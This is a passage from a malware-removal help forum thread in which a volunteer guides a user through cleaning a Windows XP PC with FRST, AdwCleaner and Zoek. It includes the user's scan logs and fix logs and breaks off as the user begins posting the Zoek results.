R0 sptd; H:\WINDOWS\System32\Drivers\sptd.sys [466008 2013-06-12] (Duplex Secure Ltd.)
R1 StarPortLite; H:\WINDOWS\System32\DRIVERS\StarPortLite.sys [97920 2013-02-04] (StarWind Software)
S3 catchme; \??\H:\DOCUME~1\Daniel\LOCALS~1\Temp\catchme.sys [X]
S3 easytether; system32\DRIVERS\easytthr.sys [X]
S3 htcdiag; system32\DRIVERS\htcdiag.sys [X]
S4 IntelIde; No ImagePath
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
U5 ScsiPort; H:\WINDOWS\system32\drivers\scsiport.sys [96384 2008-04-13] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-06-19 17:39 - 2015-06-19 17:39 - 00000000 ____D H:\FRST
2015-06-18 22:34 - 2015-06-18 22:36 - 00004842 _____ H:\Documents and Settings\Daniel\Desktop\Rkill.txt
2015-06-18 22:33 - 2015-06-18 20:57 - 01943800 _____ (Bleeping Computer, LLC) H:\Documents and Settings\Daniel\Desktop\rkill.exe
2015-06-18 22:02 - 2015-06-18 22:30 - 00000000 ____D H:\Documents and Settings\Daniel\Desktop\mbar
2015-06-18 06:19 - 2015-06-18 22:09 - 00119512 _____ (Malwarebytes Corporation) H:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-06-18 00:59 - 2015-06-18 00:59 - 00000788 _____ H:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2015-06-18 00:58 - 2015-06-18 22:05 - 00120024 _____ (Malwarebytes Corporation) H:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-06-18 00:58 - 2015-06-18 00:59 - 00000000 ____D H:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes Anti-Malware
2015-06-18 00:58 - 2015-06-18 00:58 - 00000000 ____D H:\Program Files\Malwarebytes Anti-Malware
2015-06-18 00:58 - 2015-04-14 09:37 - 00023256 _____ (Malwarebytes Corporation) H:\WINDOWS\system32\Drivers\mbam.sys
2015-06-17 18:04 - 2015-06-18 07:23 - 00008192 _____ H:\WINDOWS\system32\WDPABKP.dat
2015-06-06 04:09 - 2015-06-06 04:09 - 00000000 ____D H:\Documents and Settings\All Users\Start Menu\Programs\TeamViewer 10
2015-05-26 21:08 - 2015-05-26 21:08 - 00000000 ____D H:\Documents and Settings\Daniel\Desktop\Super 8
2015-05-25 19:12 - 2015-05-25 19:12 - 00043682 _____ H:\Documents and Settings\Daniel\Local Settings\Tempdivxf9e7
2015-05-25 19:11 - 2015-05-25 19:12 - 00003737 _____ H:\Documents and Settings\All Users\Application Data\lpm.dat
2015-05-25 10:33 - 2015-06-14 14:04 - 00000000 ____D H:\Documents and Settings\Daniel\Desktop\Torque
2015-05-24 09:11 - 2015-05-24 10:17 - 00000000 ____D H:\Program Files\AudioLabel
2015-05-24 09:11 - 2015-05-24 09:14 - 00000000 ____D H:\Documents and Settings\Daniel\Local Settings\Application Data\AudioLabel
2015-05-24 09:11 - 2015-05-24 09:11 - 00000717 _____ H:\Documents and Settings\All Users\Desktop\AudioLabel.lnk
2015-05-24 09:11 - 2015-05-24 09:11 - 00000000 ____D H:\Documents and Settings\All Users\Start Menu\Programs\AudioLabel
2015-05-22 17:51 - 2015-06-18 07:18 - 00393216 _____ H:\WINDOWS\system32\config\ACEEvent.evt
2015-05-22 17:51 - 2015-05-22 17:51 - 00000000 ____D H:\Documents and Settings\Daniel\Local Settings\Application Data\ATI
2015-05-22 17:51 - 2015-05-22 17:51 - 00000000 ____D H:\Documents and Settings\Daniel\Application Data\ATI
2015-05-22 17:51 - 2015-05-22 17:51 - 00000000 ____D H:\Documents and Settings\All Users\Application Data\ATI
2015-05-22 17:48 - 2015-05-22 17:48 - 00000131 _____ H:\Documents and Settings\All Users\Application Data\LaunchURL.bat
2015-05-22 17:48 - 2015-05-22 17:48 - 00000000 ____D H:\Documents and Settings\All Users\Start Menu\Programs\Catalyst Control Center
2015-05-22 17:47 - 2015-05-22 17:47 - 00000000 _____ H:\WINDOWS\ativpsrm.bin
2015-05-22 17:47 - 2013-04-11 13:45 - 00442368 ____R (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\ATIDEMGX.dll
2015-05-22 17:47 - 2013-04-11 12:43 - 00307200 ____R (ATI Technologies Inc.) H:\WINDOWS\system32\atiiiexx.dll
2015-05-22 17:47 - 2013-04-11 12:29 - 00296200 ____R H:\WINDOWS\system32\atiapfxx.blb
2015-05-22 17:47 - 2012-11-30 08:32 - 00662787 ____R H:\WINDOWS\system32\atiicdxx.dat
2015-05-22 17:47 - 2012-07-15 22:25 - 00038445 ____R H:\WINDOWS\atiogl.xml
2015-05-22 17:47 - 2012-05-14 02:12 - 00103040 ____R (Advanced Micro Devices) H:\WINDOWS\system32\Drivers\AtihdXP3.sys
2015-05-22 17:46 - 2013-04-11 13:56 - 00071192 _____ (Advanced Micro Devices, Inc. ) H:\WINDOWS\system32\atimpc32.dll
2015-05-22 17:46 - 2013-04-11 13:56 - 00071192 _____ (Advanced Micro Devices, Inc. ) H:\WINDOWS\system32\amdpcom32.dll
2015-05-22 17:46 - 2013-04-11 13:22 - 00212992 _____ (ATI Technologies, Inc.) H:\WINDOWS\system32\atipdlxx.dll
2015-05-22 17:46 - 2013-04-11 13:22 - 00192512 _____ (ATI Technologies Inc.) H:\WINDOWS\system32\ati2evxx.dll
2015-05-22 17:46 - 2013-04-11 13:22 - 00163840 _____ (ATI Technologies, Inc.) H:\WINDOWS\system32\Oemdspif.dll
2015-05-22 17:46 - 2013-04-11 13:22 - 00043520 _____ (ATI Technologies, Inc.) H:\WINDOWS\system32\ati2edxx.dll
2015-05-22 17:46 - 2013-04-11 13:22 - 00026112 _____ (ATI Technologies, Inc.) H:\WINDOWS\system32\Ati2mdxx.exe
2015-05-22 17:46 - 2013-04-11 13:20 - 00643072 _____ (ATI Technologies Inc.) H:\WINDOWS\system32\ati2evxx.exe
2015-05-22 17:46 - 2013-04-11 13:19 - 00053248 _____ ( ATI Technologies Inc.) H:\WINDOWS\system32\ATIDDC.DLL
2015-05-22 17:46 - 2013-04-11 12:49 - 18964480 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\atioglxx.dll
2015-05-22 17:46 - 2013-04-11 12:38 - 01586720 _____ H:\WINDOWS\system32\ativvaxx.cap
2015-05-22 17:46 - 2013-04-11 12:27 - 00163840 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\atiapfxx.exe
2015-05-22 17:46 - 2013-04-11 12:23 - 00929792 _____ (ATI Technologies Inc.) H:\WINDOWS\system32\atikvmag.dll
2015-05-22 17:46 - 2013-04-11 12:18 - 00245760 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\atiadlxx.dll
2015-05-22 17:46 - 2013-04-11 12:18 - 00017408 _____ (ATI Technologies Inc.) H:\WINDOWS\system32\atitvo32.dll
2015-05-22 17:46 - 2013-04-11 12:17 - 00053248 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\Drivers\ati2erec.dll
2015-05-22 17:46 - 2013-04-11 12:15 - 00495616 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\atiok3x2.dll
2015-05-22 17:46 - 2010-08-27 14:32 - 00294912 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\ATIODE.exe
2015-05-22 17:46 - 2009-06-22 11:34 - 00045056 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\ATIODCLI.exe
2015-05-22 17:46 - 2009-05-11 17:35 - 00118784 _____ (Advanced Micro Devices, Inc.) H:\WINDOWS\system32\atibtmon.exe
2015-05-22 17:46 - 2001-11-09 12:01 - 00024064 _____ (ATI Technologies, Inc.) H:\WINDOWS\system32\ativcoxx.dll
2015-05-22 17:45 - 2015-05-22 17:48 - 00000000 ____D H:\Program Files\ATI Technologies
2015-05-22 17:45 - 2015-05-22 17:45 - 00000000 ____D H:\Program Files\ATI
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-06-19 17:40 - 2010-08-18 11:08 - 00000000 ____D H:\Documents and Settings\Daniel\Local Settings\Temp
2015-06-19 17:25 - 2014-03-11 16:49 - 00000830 _____ H:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2015-06-19 17:23 - 2011-07-16 11:23 - 00000982 _____ H:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1645522239-117609710-725345543-1003UA.job
2015-06-19 04:25 - 2010-08-18 11:07 - 00032554 _____ H:\WINDOWS\SchedLgU.Txt
2015-06-18 22:30 - 2013-07-03 17:53 - 00000000 ____D H:\Documents and Settings\All Users\Application Data\Malwarebytes' Anti-Malware (portable)
2015-06-18 21:57 - 2010-08-18 11:01 - 01107923 _____ H:\WINDOWS\WindowsUpdate.log
2015-06-18 20:18 - 2011-02-16 00:21 - 00000000 ____D H:\Program Files\TeamViewer
2015-06-18 18:23 - 2011-07-16 11:23 - 00000930 _____ H:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1645522239-117609710-725345543-1003Core.job
2015-06-18 07:22 - 2010-08-18 06:44 - 00000402 _____ H:\WINDOWS\wiadebug.log
2015-06-18 07:20 - 2015-01-07 22:56 - 00000000 ____D H:\Documents and Settings\All Users\Application Data\TorchCrashHandler
2015-06-18 07:20 - 2010-08-18 11:07 - 00000006 ____H H:\WINDOWS\Tasks\SA.DAT
2015-06-18 07:20 - 2010-08-18 06:44 - 00000049 _____ H:\WINDOWS\wiaservc.log
2015-06-18 07:18 - 2013-04-09 20:36 - 00000000 __HDC H:\WINDOWS\$NtUninstallKB2813170$
2015-06-18 07:18 - 2010-08-18 11:08 - 00000178 ___SH H:\Documents and Settings\Daniel\ntuser.ini
2015-06-18 01:00 - 2011-10-11 17:15 - 00000000 ____D H:\Documents and Settings\Daniel\Application Data\Malwarebytes
2015-06-18 00:58 - 2011-10-11 17:15 - 00000000 ____D H:\Documents and Settings\All Users\Application Data\Malwarebytes
2015-06-18 00:20 - 2011-10-11 17:15 - 00000000 ____D H:\Program Files\Malwarebytes' Anti-Malware
2015-06-17 22:16 - 2011-07-13 22:27 - 00001984 _____ H:\WINDOWS\system32\d3d9caps.dat
2015-06-16 18:52 - 2005-04-03 18:27 - 00002228 _____ H:\WINDOWS\system32\wpa.dbl
2015-06-16 18:51 - 2013-12-21 10:31 - 00000000 ____D H:\Program Files\SUPERAntiSpyware
2015-06-16 18:45 - 2015-01-13 22:37 - 00000000 ___HD H:\Documents and Settings\All Users\Application Data\{88B60AEA-CBC9-4FDE-978C-EB22BD2333B2}
2015-06-16 12:25 - 2011-10-30 17:32 - 00000284 _____ H:\WINDOWS\Tasks\AppleSoftwareUpdate.job
2015-06-16 07:18 - 2010-08-19 20:16 - 00001738 ____H H:\Documents and Settings\Daniel\My Documents\Default.rdp
2015-06-16 07:13 - 2011-04-22 16:46 - 00000053 _____ H:\WINDOWS\brmx2001.ini
2015-06-15 02:00 - 2015-01-01 14:54 - 00000590 _____ H:\WINDOWS\Tasks\____Volume_a5c8acf3_aaa3_11df_9334_806d6172696f______Volume_f7a12243_8f08_11e4_9663_6cf0499edbd8__.job
2015-06-14 02:02 - 2011-06-06 17:20 - 00000000 ____D H:\WINDOWS\system32\NtmsData
2015-06-14 02:00 - 2015-01-03 18:22 - 00000590 _____ H:\WINDOWS\Tasks\____Volume_dae9f62a_ad27_11df_8b20_6cf0499edbd8______Volume_f7a12243_8f08_11e4_9663_6cf0499edbd8__.job
2015-06-13 00:34 - 2011-07-16 15:18 - 00000000 ____D H:\Documents and Settings\Daniel\Application Data\BitTorrent
2015-06-13 00:34 - 2010-08-19 00:11 - 00000000 ____D H:\Temp
2015-06-11 23:29 - 2010-08-19 20:38 - 00000000 ____D H:\Documents and Settings\Daniel\Application Data\FileZilla
2015-06-11 23:26 - 2010-08-22 17:26 - 00000000 ____D H:\Documents and Settings\Daniel\Local Settings\Application Data\Paint.NET
2015-06-11 23:26 - 2010-08-19 20:23 - 00000000 ____D H:\Documents and Settings\Daniel\My Documents\My PSP Files
2015-06-09 15:26 - 2010-08-19 18:49 - 00043008 _____ H:\Documents and Settings\Daniel\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-06-09 14:24 - 2011-08-13 13:53 - 00002304 _____ H:\Documents and Settings\Daniel\Desktop\Google Chrome.lnk
2015-06-07 02:01 - 2010-08-18 11:00 - 00000000 ____D H:\WINDOWS\Registration
2015-05-25 18:58 - 2013-09-25 22:29 - 00000000 ____D H:\Documents and Settings\All Users\Start Menu\Programs\DivX
2015-05-25 18:58 - 2010-11-29 01:09 - 00000000 ____D H:\Program Files\DivX
2015-05-25 18:58 - 2010-11-29 01:08 - 00000000 ____D H:\Documents and Settings\All Users\Application Data\DivX
2015-05-25 16:50 - 2013-10-09 07:03 - 00526282 _____ H:\WINDOWS\setupapi.log
2015-05-24 08:45 - 2014-02-11 20:04 - 00000000 ____D H:\Documents and Settings\Daniel\Application Data\Mp3tag
2015-05-24 02:16 - 2014-01-11 15:35 - 00000000 ____D H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch
2015-05-24 02:14 - 2014-01-11 15:36 - 00001109 _____ H:\Documents and Settings\Daniel\Start Menu\Programs\Torch.lnk
2015-05-23 15:58 - 2010-08-18 11:15 - 00000000 ____D H:\Program Files\NVIDIA Corporation
2015-05-23 15:58 - 2010-08-18 06:32 - 00000000 ____D H:\WINDOWS\Help
2015-05-22 18:18 - 2010-08-19 19:39 - 00000000 ____D H:\Program Files\Google
2015-05-22 17:43 - 2013-10-09 07:03 - 00018361 _____ H:\WINDOWS\setupact.log
 
==================== Files in the root of some directories =======
 
2011-02-02 09:34 - 2011-02-02 09:34 - 0007887 _____ () H:\Documents and Settings\Daniel\Application Data\pcouffin.cat
2011-02-02 09:34 - 2011-02-02 09:34 - 0001144 _____ () H:\Documents and Settings\Daniel\Application Data\pcouffin.inf
2011-02-02 09:34 - 2011-02-02 09:34 - 0000034 _____ () H:\Documents and Settings\Daniel\Application Data\pcouffin.log
2011-02-02 09:34 - 2011-02-02 09:34 - 0047360 _____ (VSO Software) H:\Documents and Settings\Daniel\Application Data\pcouffin.sys
2015-01-14 19:07 - 2015-01-14 19:07 - 0000480 ____H () H:\Documents and Settings\Daniel\Application Data\麽鎒駓覜
2010-08-19 18:49 - 2015-06-09 15:26 - 0043008 _____ () H:\Documents and Settings\Daniel\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-12-25 12:54 - 2011-12-25 12:54 - 0000129 _____ () H:\Documents and Settings\Daniel\Local Settings\Application Data\fusioncache.dat
2013-06-16 17:09 - 2013-06-16 17:09 - 0000218 _____ () H:\Documents and Settings\Daniel\Local Settings\Application Data\recently-used.xbel
ZeroAccess:
H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Desktop\Install
ZeroAccess:
H:\Program Files\Google\Desktop\Install
 
Some files in TEMP:
====================
H:\Documents and Settings\Daniel\Local Settings\Temp\24E.tmp-dBpoweramp-Codec-m4a FDK (AAC) Encoder-32.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\25B.tmp-QuitdBpoweramp.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\325.tmp-dBpoweramp-Codec-m4a FDK (AAC) Encoder-32.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\350.tmp-dBpoweramp-Codec-aac-encoder-32bit.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\35D.tmp-QuitdBpoweramp.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\difxapi.dll
H:\Documents and Settings\Daniel\Local Settings\Temp\DivXSetup.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\hpzmsi01.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\hpzscr01.EXE
H:\Documents and Settings\Daniel\Local Settings\Temp\jre-7u51-windows-i586-iftw.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\jre-7u55-windows-i586-iftw.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\jre-8u31-windows-au.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\jre-8u40-windows-au.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\jre-8u45-windows-au.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\siuninst.exe
H:\Documents and Settings\Daniel\Local Settings\Temp\uttB533.tmp.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
H:\WINDOWS\explorer.exe => File is digitally signed
H:\WINDOWS\system32\winlogon.exe => File is digitally signed
H:\WINDOWS\system32\svchost.exe => File is digitally signed
H:\WINDOWS\system32\services.exe => File is digitally signed
H:\WINDOWS\system32\User32.dll => File is digitally signed
H:\WINDOWS\system32\userinit.exe => File is digitally signed
H:\WINDOWS\system32\rpcss.dll => File is digitally signed
H:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
==================== End of log ============================

Attached Files



BC AdBot (Login to Remove)

 


m

#2 nasdaq

nasdaq

  • Malware Response Team
  • 38,242 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:09:07 PM

Posted 23 June 2015 - 08:51 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Run this tool to clean your Temporary files/Folders.

Download TFC to your desktop
  • Close any open windows.
  • Double click the TFC icon to run the program.
  • TFC will close all open programs itself in order to run.
  • Click the Start button to begin the process.
  • Allow TFC to run uninterrupted, it should not take long to finish.
  • Once it's finished, click OK to reboot.
  • If it does not reboot, reboot your system manually.
===

Remove these programs using the Add/Remove Programs applet.

Torch (HKU\S-1-5-21-1645522239-117609710-725345543-1003\...\Torch) (Version: 39.0.0.9626 - Torch Media, Inc) <==== ATTENTION
YTD Video Downloader PRO v4.7.3.0 (HKLM\...\YTD Video Downloader PRO v4.7.3.04.7.3.0) (Version: 4.7.3.0 - Friends in War) <==== ATTENTION

---

Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below.
 
start

CreateRestorePoint:
CloseProcesses:

(TorchMedia Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe
(Advanced Micro Devices Inc.) H:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1645522239-117609710-725345543-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope value is missing
Winsock: Catalog5 01 mswsock.dll File not found ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 03 mswsock.dll File not found ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog9 04 mswsock.dll File not found
Winsock: Catalog9 05 mswsock.dll File not found
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-08-13]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2012-10-06]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2012-10-26]
R2 TorchCrashHandler; H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe [1217032 2015-05-12] (TorchMedia Inc.) <==== ATTENTION
S4 BITS; C:\WINDOWS\system32\qmgr.dll [X]
S4 wuauserv; C:\WINDOWS\system32\wuauserv.dll [X]
S3 catchme; \??\H:\DOCUME~1\Daniel\LOCALS~1\Temp\catchme.sys [X]
S3 easytether; system32\DRIVERS\easytthr.sys [X]
S3 htcdiag; system32\DRIVERS\htcdiag.sys [X]
S4 IntelIde; No ImagePath
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
AlternateDataStreams: H:\Documents and Settings\All Users\Application Data\TEMP:FB1B13D8
H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch

End
Save the files as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the Report button and the report will open in Notepad.
IMPORTANT
  • If you click the Clean button all items listed in the report will be removed.
If you find some false positive items or programs that you wish to keep, Close the AdwCleaner windows.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Check off the element(s) you wish to keep.
  • Click on the Clean button follow the prompts.
  • A log file will automatically open after the scan has finished.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).
===

How is the computer running now?

#3 danielzink

danielzink
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:10:07 PM

Posted 23 June 2015 - 06:43 PM

Fix result of Farbar Recovery Scan Tool (x86) Version: 13-06-2015
Ran by Daniel at 2015-06-23 22:41:01 Run:1
Running from E:\AV\frst
Loaded Profiles: Daniel (Available Profiles: Daniel)
Boot Mode: Normal

==============================================

fixlist content:
*****************
start

CreateRestorePoint:
CloseProcesses:

(TorchMedia Inc.) H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe
(Advanced Micro Devices Inc.) H:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1645522239-117609710-725345543-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope value is missing
Winsock: Catalog5 01 mswsock.dll File not found ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 03 mswsock.dll File not found ATTENTION: LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog9 04 mswsock.dll File not found
Winsock: Catalog9 05 mswsock.dll File not found
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-08-13]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2012-10-06]
FF Extension: Java Console - H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2012-10-26]
R2 TorchCrashHandler; H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe [1217032 2015-05-12] (TorchMedia Inc.) <==== ATTENTION
S4 BITS; C:\WINDOWS\system32\qmgr.dll [X]
S4 wuauserv; C:\WINDOWS\system32\wuauserv.dll [X]
S3 catchme; \??\H:\DOCUME~1\Daniel\LOCALS~1\Temp\catchme.sys [X]
S3 easytether; system32\DRIVERS\easytthr.sys [X]
S3 htcdiag; system32\DRIVERS\htcdiag.sys [X]
S4 IntelIde; No ImagePath
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
AlternateDataStreams: H:\Documents and Settings\All Users\Application Data\TEMP:FB1B13D8
H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch

End
*****************

Restore point was successfully created.
Processes closed successfully.
H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch\Update\TorchCrashHandler.exe => No running process found
H:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe => No running process found
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully.
"HKU\S-1-5-21-1645522239-117609710-725345543-1003\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
Winsock: Catalog5 entry 000000000001\\LibraryPath  was set successfully to %SystemRoot%\System32\mswsock.dll
Winsock: Catalog5 entry 000000000003\\LibraryPath  was set successfully to %SystemRoot%\System32\mswsock.dll
The possible legit Catalog entry "000000000004" will not be deleted with FRST. Instead, "netsh winsock reset" can be used.
The possible legit Catalog entry "000000000005" will not be deleted with FRST. Instead, "netsh winsock reset" can be used.
H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} => moved successfully.
H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} => moved successfully.
H:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} => moved successfully.
TorchCrashHandler => Service not found.
BITS => Service removed successfully.
wuauserv => Service removed successfully.
catchme => Service removed successfully.
easytether => Service removed successfully.
htcdiag => Service removed successfully.
IntelIde => Service removed successfully.
lmimirr => Service removed successfully.
H:\Documents and Settings\All Users\Application Data\TEMP => ":FB1B13D8" ADS removed successfully..
"H:\Documents and Settings\Daniel\Local Settings\Application Data\Torch" => File/Folder not found.

The system needed a reboot.

==== End of Fixlog 22:41:08 ====

 

 

# AdwCleaner v4.207 - Logfile created 23/06/2015 at 22:49:26
# Updated 21/06/2015 by Xplode
# Database : 2015-06-21.1 [Local]
# Operating system : Microsoft Windows XP Service Pack 3 (x86)
# Username : Daniel - DAN
# Running from : H:\Documents and Settings\Daniel\Desktop\adwcleaner_4.207.exe
# Option : Cleaning

***** [ Services ] *****

***** [ Files / Folders ] *****

Folder Deleted : H:\Documents and Settings\All Users\Application Data\ytd video downloader
Folder Deleted : H:\Documents and Settings\Daniel\My Documents\Updater
[!] Folder Deleted : H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lfmhcpmkbdkbgbmkjoiopeeegenkdikp
File Deleted : H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\chrome-extension_lfmhcpmkbdkbgbmkjoiopeeegenkdikp_0.localstorage
File Deleted : H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\chrome-extension_lfmhcpmkbdkbgbmkjoiopeeegenkdikp_0.localstorage-journal
File Deleted : H:\END
File Deleted : H:\Documents and Settings\Daniel\Desktop\eBay.lnk
File Deleted : H:\Program Files\Mozilla Firefox\defaults\pref\itms.js
File Deleted : H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\hxxp_www.yourtango.com_0.localstorage
File Deleted : H:\Documents and Settings\Daniel\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\hxxp_www.yourtango.com_0.localstorage-journal

***** [ Scheduled tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ask.com
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1663C10B-0D55-438D-8496-19A3DBAEC0E4}
Key Deleted : HKCU\Software\Conduit
Key Deleted : HKCU\Software\systweak
Key Deleted : HKCU\Software\torch
Key Deleted : HKLM\SOFTWARE\DivX\Install\Setup\WizardLayout\ConduitToolbar
Key Deleted : HKLM\SOFTWARE\torch
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7}
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - *.local

***** [ Web browsers ] *****

-\\ Internet Explorer v8.0.6001.18702

-\\ Mozilla Firefox v12.0 (en-US)

-\\ Google Chrome v

*************************

AdwCleaner[R0].txt - [2576 bytes] - [23/06/2015 22:47:16]
AdwCleaner[S0].txt - [2543 bytes] - [23/06/2015 22:49:26]

########## EOF - H:\AdwCleaner\AdwCleaner[S0].txt - [2602  bytes] ##########

 

 

 

 

No change in computer operation.

 

It's so laggy I can watch each letter appear a second or two after typing it.

 

At shutdown/restart I get multiple error messages (msiexec, qttask, msdtc). I also got a random popup at shutdown/restart this morning.

 

IP is still wrong.


Edited by danielzink, 24 June 2015 - 06:33 AM.


#4 nasdaq

nasdaq

  • Malware Response Team
  • 38,242 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:09:07 PM

Posted 24 June 2015 - 07:52 AM

Temporarily disable your AV program so it does not interfere.
Info on how to disable your security applications How To Temporarily Disable Your Anti-virus, Firewall And Anti-malware Programs - Security Mini-Guides.

Download Zeok tool from here

When the download appears, save to the Desktop.
On the Desktop, right-click the Zoek.exe file and select: Run as Administrator
(Give it a few seconds to appear.)

Next, copy/paste the entire script inside the code box below to the input field of Zoek:
createsrpoint;
autoclean;
emptyalltemp;
ipconfig /flushdns;b
Now...
Close any open Browsers.
Click the Run script button, and wait. It takes a few minutes to run all the script.

When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.

Please attach the zoek-results.log in your reply.

Also, please provide an update on how the computer is behaving after running the above script.

#5 danielzink

danielzink
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:10:07 PM

Posted 24 June 2015 - 04:15 PM

zoek log:

 

